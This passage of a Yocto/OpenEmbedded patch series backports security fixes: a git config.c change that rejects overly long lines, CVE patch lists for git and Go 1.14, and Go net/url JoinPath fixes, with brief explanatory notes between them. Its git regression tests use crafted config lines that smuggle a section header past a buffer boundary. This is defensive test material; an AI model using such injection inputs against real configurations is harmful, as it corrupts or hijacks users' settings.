+--- a/config.c
++++ b/config.c
+@@ -2987,9 +2987,10 @@ void git_config_set_multivar(const char *key, const char *value,
+ multi_replace);
+ }
+
+-static int section_name_match (const char *buf, const char *name)
++static size_t section_name_match (const char *buf, const char *name)
+ {
+- int i = 0, j = 0, dot = 0;
++ size_t i = 0, j = 0;
++ int dot = 0;
+ if (buf[i] != '[')
+ return 0;
+ for (i = 1; buf[i] && buf[i] != ']'; i++) {
+@@ -3042,6 +3043,8 @@ static int section_name_is_ok(const char *name)
+ return 1;
+ }
+
++#define GIT_CONFIG_MAX_LINE_LEN (512 * 1024)
++
+ /* if new_name == NULL, the section is removed instead */
+ static int git_config_copy_or_rename_section_in_file(const char *config_filename,
+ const char *old_name,
+@@ -3051,11 +3054,12 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ char *filename_buf = NULL;
+ struct lock_file lock = LOCK_INIT;
+ int out_fd;
+- char buf[1024];
++ struct strbuf buf = STRBUF_INIT;
+ FILE *config_file = NULL;
+ struct stat st;
+ struct strbuf copystr = STRBUF_INIT;
+ struct config_store_data store;
++ uint32_t line_nr = 0;
+
+ memset(&store, 0, sizeof(store));
+
+@@ -3092,16 +3096,25 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ goto out;
+ }
+
+- while (fgets(buf, sizeof(buf), config_file)) {
+- int i;
+- int length;
++ while (!strbuf_getwholeline(&buf, config_file, '\n')) {
++ size_t i, length;
+ int is_section = 0;
+- char *output = buf;
+- for (i = 0; buf[i] && isspace(buf[i]); i++)
++ char *output = buf.buf;
++
++ line_nr++;
++
++ if (buf.len >= GIT_CONFIG_MAX_LINE_LEN) {
++ ret = error(_("refusing to work with overly long line "
++ "in '%s' on line %"PRIuMAX),
++ config_filename, (uintmax_t)line_nr);
++ goto out;
++ }
++
++ for (i = 0; buf.buf[i] && isspace(buf.buf[i]); i++)
+ ; /* do nothing */
+- if (buf[i] == '[') {
++ if (buf.buf[i] == '[') {
+ /* it's a section */
+- int offset;
++ size_t offset;
+ is_section = 1;
+
+ /*
+@@ -3118,7 +3131,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ strbuf_reset(&copystr);
+ }
+
+- offset = section_name_match(&buf[i], old_name);
++ offset = section_name_match(&buf.buf[i], old_name);
+ if (offset > 0) {
+ ret++;
+ if (new_name == NULL) {
+@@ -3193,6 +3206,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ out_no_rollback:
+ free(filename_buf);
+ config_store_data_clear(&store);
++ strbuf_release(&buf);
+ return ret;
+ }
+
+diff --git a/t/t1300-config.sh b/t/t1300-config.sh
+index 983a0a1..9b67f6b 100755
+--- a/t/t1300-config.sh
++++ b/t/t1300-config.sh
+@@ -616,6 +616,36 @@ test_expect_success 'renaming to bogus section is rejected' '
+ test_must_fail git config --rename-section branch.zwei "bogus name"
+ '
+
++test_expect_success 'renaming a section with a long line' '
++ {
++ printf "[b]\\n" &&
++ printf " c = d %1024s [a] e = f\\n" " " &&
++ printf "[a] g = h\\n"
++ } >y &&
++ git config -f y --rename-section a xyz &&
++ test_must_fail git config -f y b.e
++'
++
++test_expect_success 'renaming an embedded section with a long line' '
++ {
++ printf "[b]\\n" &&
++ printf " c = d %1024s [a] [foo] e = f\\n" " " &&
++ printf "[a] g = h\\n"
++ } >y &&
++ git config -f y --rename-section a xyz &&
++ test_must_fail git config -f y foo.e
++'
++
++test_expect_success 'renaming a section with an overly-long line' '
++ {
++ printf "[b]\\n" &&
++ printf " c = d %525000s e" " " &&
++ printf "[a] g = h\\n"
++ } >y &&
++ test_must_fail git config -f y --rename-section a xyz 2>err &&
++ test_i18ngrep "refusing to work with overly long line in .y. on line 2" err
++'
++
+ cat >> .git/config << EOF
+ [branch "zwei"] a = 1 [branch "vier"]
+ EOF
+--
+2.25.1
+
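The rename/delete path now reads whole lines into a strbuf and refuses any line of 512 KiB or more; previously the fixed 1024-byte fgets() buffer split long lines, and a later fragment could be parsed as a section header. A rough Go equivalent of the length guard (the constant is taken from the patch; not git's config.c):

```
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// gitConfigMaxLineLen mirrors GIT_CONFIG_MAX_LINE_LEN from the patch above.
const gitConfigMaxLineLen = 512 * 1024

// checkConfigLines rejects overly long lines instead of silently splitting
// them, which is what made the section-injection trick possible.
func checkConfigLines(r *bufio.Reader) error {
	lineNr := 0
	for {
		line, err := r.ReadString('\n')
		if len(line) == 0 && err != nil {
			return nil // EOF
		}
		lineNr++
		if len(line) >= gitConfigMaxLineLen {
			return fmt.Errorf("refusing to work with overly long line on line %d", lineNr)
		}
		if err != nil {
			return nil
		}
	}
}

func main() {
	cfg := "[b]\n c = d " + strings.Repeat(" ", 525000) + "e\n[a] g = h\n"
	fmt.Println(checkConfigLines(bufio.NewReader(strings.NewReader(cfg))))
	// refusing to work with overly long line on line 2
}
```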
diff --git a/meta/recipes-devtools/git/git.inc b/meta/recipes-devtools/git/git.inc
index 4131c98977..e64472ea28 100644
--- a/meta/recipes-devtools/git/git.inc
+++ b/meta/recipes-devtools/git/git.inc
@@ -1,5 +1,6 @@
SUMMARY = "Distributed version control system"
HOMEPAGE = "http://git-scm.com"
+DESCRIPTION = "Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency."
SECTION = "console/utils"
LICENSE = "GPLv2"
DEPENDS = "openssl curl zlib expat"
@@ -7,14 +8,44 @@ DEPENDS = "openssl curl zlib expat"
PROVIDES_append_class-native = " git-replacement-native"
SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
- ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages"
-
+ ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages \
+ file://fixsort.patch \
+ file://CVE-2021-40330.patch \
+ file://CVE-2022-23521.patch \
+ file://CVE-2022-41903-01.patch \
+ file://CVE-2022-41903-02.patch \
+ file://CVE-2022-41903-03.patch \
+ file://CVE-2022-41903-04.patch \
+ file://CVE-2022-41903-05.patch \
+ file://CVE-2022-41903-06.patch \
+ file://CVE-2022-41903-07.patch \
+ file://CVE-2022-41903-08.patch \
+ file://CVE-2022-41903-09.patch \
+ file://CVE-2022-41903-10.patch \
+ file://CVE-2022-41903-11.patch \
+ file://CVE-2022-41903-12.patch \
+ file://CVE-2023-22490-1.patch \
+ file://CVE-2023-22490-2.patch \
+ file://CVE-2023-22490-3.patch \
+ file://CVE-2023-23946.patch \
+ file://CVE-2023-29007.patch \
+ file://CVE-2023-25652.patch \
+ "
S = "${WORKDIR}/git-${PV}"
LIC_FILES_CHKSUM = "file://COPYING;md5=7c0d7ef03a7eb04ce795b0f60e68e7e1"
CVE_PRODUCT = "git-scm:git"
+# This is about a manpage not mentioning that --mirror may "leak" information
+# in mirrored git repos. Most OE users wouldn't build the docs and
+# we don't see this as a major issue for our general users/use cases.
+CVE_CHECK_WHITELIST += "CVE-2022-24975"
+# This is specific to Git-for-Windows
+CVE_CHECK_WHITELIST += "CVE-2022-41953"
+# This is also specific to Git for Windows
+CVE_CHECK_WHITELIST += "CVE-2023-22743"
+
PACKAGECONFIG ??= ""
PACKAGECONFIG[cvsserver] = ""
PACKAGECONFIG[svn] = ""
diff --git a/meta/recipes-devtools/git/git/fixsort.patch b/meta/recipes-devtools/git/git/fixsort.patch
new file mode 100644
index 0000000000..eec1f84945
--- /dev/null
+++ b/meta/recipes-devtools/git/git/fixsort.patch
@@ -0,0 +1,36 @@
+[PATCH] generate-cmdlist.sh: Fix determinism issue
+
+Currently git binaries are not entirely reproducible, at least partly
+due to config-list.h differing in order depending on the system's
+locale settings. Under different locales, the entries:
+
+"sendemail.identity",
+"sendemail.<identity>.*",
+
+would differ in order, for example, and this leads to differences in
+the debug symbols for the binaries.
+
+This can be fixed by specifying the C locale for the sort in the
+shell script generating the header.
+
+Note: This is a backport of Richard Purdie's original patch for a more
+recent version of git. The offending code in this older version is
+in generate-cmdlist.sh. The upstream current version has this code
+in generate-configlist.sh.
+
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+Upstream-Status: Submitted [https://public-inbox.org/git/f029a942dd3d50d85e60bd37d8e454524987842f.camel@linuxfoundation.org/T/#u]
+
+index 71158f7..c137091 100755
+--- a/generate-cmdlist.sh
++++ b/generate-cmdlist.sh
+@@ -82,7 +82,7 @@ static const char *config_name_list[] = {
+ EOF
+ grep -h '^[a-zA-Z].*\..*::$' Documentation/*config.txt Documentation/config/*.txt |
+ sed '/deprecated/d; s/::$//; s/, */\n/g' |
+- sort |
++ LC_ALL=C sort |
+ while read line
+ do
+ echo " \"$line\","
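The patch pins the shell `sort` to the C locale so config-list.h comes out in the same order on every build host. The goal is a plain byte-wise comparison; in Go, the same deterministic ordering of the two entries named in the description looks like this (illustrative only):

```
package main

import (
	"fmt"
	"sort"
)

func main() {
	// Locale-aware sorts may order these two either way; a byte-wise
	// (LC_ALL=C) comparison always puts '<' (0x3c) before 'i' (0x69).
	entries := []string{"sendemail.identity", "sendemail.<identity>.*"}
	sort.Strings(entries)
	fmt.Println(entries)
	// [sendemail.<identity>.* sendemail.identity]
}
```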
diff --git a/meta/recipes-devtools/git/git_2.24.3.bb b/meta/recipes-devtools/git/git_2.24.4.bb
index ddd875f07b..f38c25f0ef 100644
--- a/meta/recipes-devtools/git/git_2.24.3.bb
+++ b/meta/recipes-devtools/git/git_2.24.4.bb
@@ -5,5 +5,5 @@ EXTRA_OECONF += "ac_cv_snprintf_returns_bogus=no \
"
EXTRA_OEMAKE += "NO_GETTEXT=1"
-SRC_URI[tarball.sha256sum] = "ef6d1d1de1d7921a54d23d07479bd2766f050d6435cea5d3b5322aa4897cb3d7"
-SRC_URI[manpages.sha256sum] = "325795ba33c0be02370de79636f32ad3b447665c1f2b5b4de65181fa804bed31"
+SRC_URI[tarball.sha256sum] = "6e119e70d3762f28e1dc9928c526eb4d7519fd3870f862775cd10186653eb85a"
+SRC_URI[manpages.sha256sum] = "e687bcc91a6fd9cb74243f91a9c2d77c50ce202a09b35931021ecc521a373ed5"
diff --git a/meta/recipes-devtools/glide/glide_0.13.3.bb b/meta/recipes-devtools/glide/glide_0.13.3.bb
index 31295edf90..21773d91f9 100644
--- a/meta/recipes-devtools/glide/glide_0.13.3.bb
+++ b/meta/recipes-devtools/glide/glide_0.13.3.bb
@@ -1,10 +1,11 @@
SUMMARY = "Vendor Package Management for Golang"
-HOMEPAGE = "https://glide.sh"
+HOMEPAGE = "https://github.com/Masterminds/glide"
+DESCRIPTION = "Glide is a Vendor Package Management for Golang"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2"
GO_IMPORT = "github.com/Masterminds/glide"
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master"
SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf"
inherit go
diff --git a/meta/recipes-devtools/gnu-config/gnu-config_git.bb b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
index 48b7e6d4a6..05cd6a1e63 100644
--- a/meta/recipes-devtools/gnu-config/gnu-config_git.bb
+++ b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "gnu-configize"
DESCRIPTION = "Tool that installs the GNU config.guess / config.sub into a directory tree"
+HOMEPAGE = "https://git.savannah.gnu.org/cgit/config.git"
SECTION = "devel"
LICENSE = "GPL-3.0-with-autoconf-exception"
LIC_FILES_CHKSUM = "file://config.guess;beginline=7;endline=27;md5=b75d42f59f706ea56d6a8e00216fca6a"
@@ -11,7 +12,7 @@ INHIBIT_DEFAULT_DEPS = "1"
SRCREV = "5256817ace8493502ec88501a19e4051c2e220b0"
PV = "20200117+git${SRCPV}"
-SRC_URI = "git://git.savannah.gnu.org/config.git \
+SRC_URI = "git://git.savannah.gnu.org/git/config.git;protocol=https;branch=master \
file://gnu-configize.in"
S = "${WORKDIR}/git"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-devtools/go/go-1.14.inc b/meta/recipes-devtools/go/go-1.14.inc
index 8f8ed89de8..9c7ceda891 100644
--- a/meta/recipes-devtools/go/go-1.14.inc
+++ b/meta/recipes-devtools/go/go-1.14.inc
@@ -1,7 +1,7 @@
require go-common.inc
GO_BASEVERSION = "1.14"
-GO_MINOR = ".7"
+GO_MINOR = ".15"
PV .= "${GO_MINOR}"
FILESEXTRAPATHS_prepend := "${FILE_DIRNAME}/go-${GO_BASEVERSION}:"
@@ -16,6 +16,112 @@ SRC_URI += "\
file://0006-cmd-dist-separate-host-and-target-builds.patch \
file://0007-cmd-go-make-GOROOT-precious-by-default.patch \
file://0008-use-GOBUILDMODE-to-set-buildmode.patch \
+ file://CVE-2021-34558.patch \
+ file://CVE-2021-33196.patch \
+ file://CVE-2021-33197.patch \
+ file://CVE-2021-38297.patch \
+ file://CVE-2022-23806.patch \
+ file://CVE-2022-23772.patch \
+ file://CVE-2021-44717.patch \
+ file://CVE-2022-24675.patch \
+ file://CVE-2021-31525.patch \
+ file://CVE-2022-30629.patch \
+ file://CVE-2022-30631.patch \
+ file://CVE-2022-30632.patch \
+ file://CVE-2022-30633.patch \
+ file://CVE-2022-30635.patch \
+ file://CVE-2022-32148.patch \
+ file://CVE-2022-32189.patch \
+ file://CVE-2021-27918.patch \
+ file://CVE-2021-36221.patch \
+ file://CVE-2021-39293.patch \
+ file://CVE-2021-41771.patch \
+ file://CVE-2022-27664.patch \
+ file://0001-CVE-2022-32190.patch \
+ file://0002-CVE-2022-32190.patch \
+ file://0003-CVE-2022-32190.patch \
+ file://0004-CVE-2022-32190.patch \
+ file://CVE-2022-2880.patch \
+ file://CVE-2022-2879.patch \
+ file://CVE-2021-33195.patch \
+ file://CVE-2021-33198.patch \
+ file://CVE-2021-44716.patch \
+ file://CVE-2022-24921.patch \
+ file://CVE-2022-28131.patch \
+ file://CVE-2022-28327.patch \
+ file://CVE-2022-41715.patch \
+ file://CVE-2022-41717.patch \
+ file://CVE-2022-1962.patch \
+ file://CVE-2022-41723.patch \
+ file://CVE-2022-41722-1.patch \
+ file://CVE-2022-41722-2.patch \
+ file://CVE-2020-29510.patch \
+ file://CVE-2023-24537.patch \
+ file://CVE-2023-24534.patch \
+ file://CVE-2023-24538-1.patch \
+ file://CVE-2023-24538-2.patch \
+ file://CVE-2023-24538_3.patch \
+ file://CVE-2023-24538_4.patch \
+ file://CVE-2023-24538_5.patch \
+ file://CVE-2023-24538_6.patch \
+ file://CVE-2023-24539.patch \
+ file://CVE-2023-24540.patch \
+ file://CVE-2023-29405-1.patch \
+ file://CVE-2023-29405-2.patch \
+ file://CVE-2023-29402.patch \
+ file://CVE-2023-29404.patch \
+ file://CVE-2023-29400.patch \
+ file://CVE-2023-29406-1.patch \
+ file://CVE-2023-29406-2.patch \
+ file://CVE-2023-29409.patch \
+ file://CVE-2022-41725-pre1.patch \
+ file://CVE-2022-41725-pre2.patch \
+ file://CVE-2022-41725-pre3.patch \
+ file://CVE-2022-41725.patch \
+ file://CVE-2023-24536_1.patch \
+ file://CVE-2023-24536_2.patch \
+ file://CVE-2023-24536_3.patch \
+ file://CVE-2023-39318.patch \
+ file://CVE-2023-39319.patch \
+ file://CVE-2023-39326.patch \
+ file://CVE-2023-45287-pre1.patch \
+ file://CVE-2023-45287-pre2.patch \
+ file://CVE-2023-45287-pre3.patch \
+ file://CVE-2023-45287.patch \
+ file://CVE-2023-45289.patch \
+ file://CVE-2023-45290.patch \
+ file://CVE-2024-24785.patch \
+ file://CVE-2024-24784.patch \
"
+
SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch"
-SRC_URI[main.sha256sum] = "064392433563660c73186991c0a315787688e7c38a561e26647686f89b6c30e3"
+SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149"
+
+# Upstream doesn't believe it is a significant real-world issue and will only
+# fix it in 1.17 onwards, where we can drop this.
+# https://github.com/golang/go/issues/30999#issuecomment-910470358
+CVE_CHECK_WHITELIST += "CVE-2021-29923"
+
+# This issue affects go1.15 onwards
+# https://security-tracker.debian.org/tracker/CVE-2022-29526
+CVE_CHECK_WHITELIST += "CVE-2022-29526"
+
+# Issue only on Windows
+CVE_CHECK_WHITELIST += "CVE-2022-29804"
+CVE_CHECK_WHITELIST += "CVE-2022-30580"
+CVE_CHECK_WHITELIST += "CVE-2022-30634"
+
+# Issue is in golang.org/x/net/html/parse.go, which is not used in the Go compiler
+CVE_CHECK_WHITELIST += "CVE-2021-33194"
+
+# Issue introduced in go1.16, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2021-41772"
+
+# Fixes code that was added in go1.16, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2022-30630"
+
+# This is specific to Microsoft Windows
+CVE_CHECK_WHITELIST += "CVE-2022-41716"
+
+# Issue introduced in go1.15beta1, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2022-1705"
diff --git a/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
new file mode 100644
index 0000000000..ad263b8023
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
@@ -0,0 +1,74 @@
+From 755f2dc35a19e6806de3ecbf836fa06ad875c67a Mon Sep 17 00:00:00 2001
+From: Carl Johnson <me@carlmjohnson.net>
+Date: Fri, 4 Mar 2022 14:49:52 +0000
+Subject: [PATCH 1/4] net/url: add JoinPath, URL.JoinPath
+
+Builds on CL 332209.
+
+Fixes #47005
+
+Change-Id: I82708dede05d79a196ca63f5a4e7cb5ac9a041ea
+GitHub-Last-Rev: 51b735066eef74f5e67c3e8899c58f44c0383c61
+GitHub-Pull-Request: golang/go#50383
+Reviewed-on: https://go-review.googlesource.com/c/go/+/374654
+Reviewed-by: Russ Cox <rsc@golang.org>
+Auto-Submit: Russ Cox <rsc@golang.org>
+Trust: Ian Lance Taylor <iant@golang.org>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/604140d93111f89911e17cb147dcf6a02d2700d0]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 23 +++++++++++++++++++++++
+ 1 file changed, 23 insertions(+)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 2880e82..dea8bfe 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -13,6 +13,7 @@ package url
+ import (
+ "errors"
+ "fmt"
++ "path"
+ "sort"
+ "strconv"
+ "strings"
+@@ -1104,6 +1105,17 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ return nil
+ }
+
++// JoinPath returns a new URL with the provided path elements joined to
++// any existing path and the resulting path cleaned of any ./ or ../ elements.
++func (u *URL) JoinPath(elem ...string) *URL {
++ url := *u
++ if len(elem) > 0 {
++ elem = append([]string{u.Path}, elem...)
++ url.setPath(path.Join(elem...))
++ }
++ return &url
++}
++
+ // validUserinfo reports whether s is a valid userinfo string per RFC 3986
+ // Section 3.2.1:
+ // userinfo = *( unreserved / pct-encoded / sub-delims / ":" )
+@@ -1144,3 +1156,14 @@ func stringContainsCTLByte(s string) bool {
+ }
+ return false
+ }
++
++// JoinPath returns a URL string with the provided path elements joined to
++// the existing path of base and the resulting path cleaned of any ./ or ../ elements.
++func JoinPath(base string, elem ...string) (result string, err error) {
++ url, err := Parse(base)
++ if err != nil {
++ return
++ }
++ result = url.JoinPath(elem...).String()
++ return
++}
+--
+2.7.4
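The backported `URL.JoinPath` method and `url.JoinPath` helper join path elements onto an existing URL and clean the result. A short usage sketch (this assumes a Go toolchain that ships JoinPath, i.e. this patched 1.14 or upstream Go 1.19 and later):

```
package main

import (
	"fmt"
	"net/url"
)

func main() {
	base, _ := url.Parse("https://example.com/api")
	fmt.Println(base.JoinPath("v1", "users").String())
	// https://example.com/api/v1/users

	s, err := url.JoinPath("https://example.com/api/", "v1/", "users")
	fmt.Println(s, err)
	// https://example.com/api/v1/users <nil>
}
```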
diff --git a/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
new file mode 100644
index 0000000000..1a11cc72bc
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
@@ -0,0 +1,48 @@
+From 985108de87e7d2ecb2b28cb53b323d530387b884 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Thu, 31 Mar 2022 13:21:39 -0700
+Subject: [PATCH 2/4] net/url: preserve a trailing slash in JoinPath
+
+Fixes #52074
+
+Change-Id: I30897f32e70a6ca0c4e11aaf07088c27336efaba
+Reviewed-on: https://go-review.googlesource.com/c/go/+/397256
+Trust: Ian Lance Taylor <iant@golang.org>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matt Layher <mdlayher@gmail.com>
+Trust: Matt Layher <mdlayher@gmail.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/dbb52cc9f3e83a3040f46c2ae7650c15ab342179]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index dea8bfe..3436707 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1107,11 +1107,18 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+
+ // JoinPath returns a new URL with the provided path elements joined to
+ // any existing path and the resulting path cleaned of any ./ or ../ elements.
++// Any sequences of multiple / characters will be reduced to a single /.
+ func (u *URL) JoinPath(elem ...string) *URL {
+ url := *u
+ if len(elem) > 0 {
+ elem = append([]string{u.Path}, elem...)
+- url.setPath(path.Join(elem...))
++ p := path.Join(elem...)
++ // path.Join will remove any trailing slashes.
++ // Preserve at least one.
++ if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
++ p += "/"
++ }
++ url.setPath(p)
+ }
+ return &url
+ }
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
new file mode 100644
index 0000000000..816d914983
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
@@ -0,0 +1,36 @@
+From 2c632b883b0f11084cc247c8b50ad6c71fa7b447 Mon Sep 17 00:00:00 2001
+From: Sean Liao <sean@liao.dev>
+Date: Sat, 9 Jul 2022 18:38:45 +0100
+Subject: [PATCH 3/4] net/url: use EscapedPath for url.JoinPath
+
+Fixes #53763
+
+Change-Id: I08b53f159ebdce7907e8cc17316fd0c982363239
+Reviewed-on: https://go-review.googlesource.com/c/go/+/416774
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Bryan Mills <bcmills@google.com>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf5898ef53d1693aa572da0da746c05e9a6f15c5]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 3436707..73079a5 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1111,7 +1111,7 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ func (u *URL) JoinPath(elem ...string) *URL {
+ url := *u
+ if len(elem) > 0 {
+- elem = append([]string{u.Path}, elem...)
++ elem = append([]string{u.EscapedPath()}, elem...)
+ p := path.Join(elem...)
+ // path.Join will remove any trailing slashes.
+ // Preserve at least one.
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
new file mode 100644
index 0000000000..4bdff3aed4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
@@ -0,0 +1,82 @@
+From f61e428699cbb52bab31fe2c124f49d085a209fe Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 12 Aug 2022 16:21:09 -0700
+Subject: [PATCH 4/4] net/url: consistently remove ../ elements in JoinPath
+
+JoinPath would fail to remove relative elements from the start of
+the path when the first path element is "".
+
+In addition, JoinPath would return the original path unmodified
+when provided with no elements to join, violating the documented
+behavior of always cleaning the resulting path.
+
+Correct both these cases.
+
+ JoinPath("http://go.dev", "../go")
+ // before: http://go.dev/../go
+ // after: http://go.dev/go
+
+ JoinPath("http://go.dev/../go")
+ // before: http://go.dev/../go
+ // after: http://go.dev/go
+
+For #54385.
+Fixes #54635.
+Fixes CVE-2022-32190.
+
+Change-Id: I6d22cd160d097c50703dd96e4f453c6c118fd5d9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/423514
+Reviewed-by: David Chase <drchase@google.com>
+Reviewed-by: Alan Donovan <adonovan@google.com>
+(cherry picked from commit 0765da5884adcc8b744979303a36a27092d8fc51)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/425357
+Run-TryBot: Damien Neil <dneil@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/28335508913a46e05ef0c04a18e8a1a6beb775ec]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 26 ++++++++++++++++----------
+ 1 file changed, 16 insertions(+), 10 deletions(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 73079a5..1e8baf9 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1109,17 +1109,23 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ // any existing path and the resulting path cleaned of any ./ or ../ elements.
+ // Any sequences of multiple / characters will be reduced to a single /.
+ func (u *URL) JoinPath(elem ...string) *URL {
+- url := *u
+- if len(elem) > 0 {
+- elem = append([]string{u.EscapedPath()}, elem...)
+- p := path.Join(elem...)
+- // path.Join will remove any trailing slashes.
+- // Preserve at least one.
+- if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
+- p += "/"
+- }
+- url.setPath(p)
++ elem = append([]string{u.EscapedPath()}, elem...)
++ var p string
++ if !strings.HasPrefix(elem[0], "/") {
++ // Return a relative path if u is relative,
++ // but ensure that it contains no ../ elements.
++ elem[0] = "/" + elem[0]
++ p = path.Join(elem...)[1:]
++ } else {
++ p = path.Join(elem...)
+ }
++ // path.Join will remove any trailing slashes.
++ // Preserve at least one.
++ if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
++ p += "/"
++ }
++ url := *u
++ url.setPath(p)
+ return &url
+ }
+
+--
+2.7.4
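With the final patch in the series applied, relative elements are cleaned even when the base path is empty or already contains "../", matching the before/after examples in the commit message. A quick check (same JoinPath availability caveat as above):

```
package main

import (
	"fmt"
	"net/url"
)

func main() {
	s, _ := url.JoinPath("http://go.dev", "../go")
	fmt.Println(s) // http://go.dev/go, not http://go.dev/../go

	u, _ := url.Parse("http://go.dev/../go")
	fmt.Println(u.JoinPath().String()) // http://go.dev/go
}
```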
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
new file mode 100644
index 0000000000..e1c9e0bdb9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
@@ -0,0 +1,65 @@
+From a0bf4d38dc2057d28396594264bbdd43d412de22 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Tue, 27 Oct 2020 00:21:30 +0100
+Subject: [PATCH] encoding/xml: replace comments inside directives with a space
+
+A Directive (like <!ENTITY xxx []>) can't have other nodes nested inside
+it (in our data structure representation), so there is no way to
+preserve comments. The previous behavior was to just elide them, which
+however might change the semantic meaning of the surrounding markup.
+Instead, replace them with a space which hopefully has the same semantic
+effect of the comment.
+
+Directives are not actually a node type in the XML spec, which instead
+specifies each of them separately (<!ENTITY, <!DOCTYPE, etc.), each with
+its own grammar. The rules for where and when the comments are allowed
+are not straightforward, and can't be implemented without implementing
+custom logic for each of the directives.
+
+Simply preserving the comments in the body of the directive would be
+problematic, as there can be unmatched quotes inside the comment.
+Whether those quotes are considered meaningful semantically or not,
+other parsers might disagree and interpret the output differently.
+
+This issue was reported by Juho Nurminen of Mattermost as it leads to
+round-trip mismatches. See #43168. It's not being fixed in a security
+release because round-trip stability is not a currently supported
+security property of encoding/xml, and we don't believe these fixes
+would be sufficient to reliably guarantee it in the future.
+
+Fixes CVE-2020-29510
+Updates #43168
+
+Change-Id: Icd86c75beff3e1e0689543efebdad10ed5178ce3
+Reviewed-on: https://go-review.googlesource.com/c/go/+/277893
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
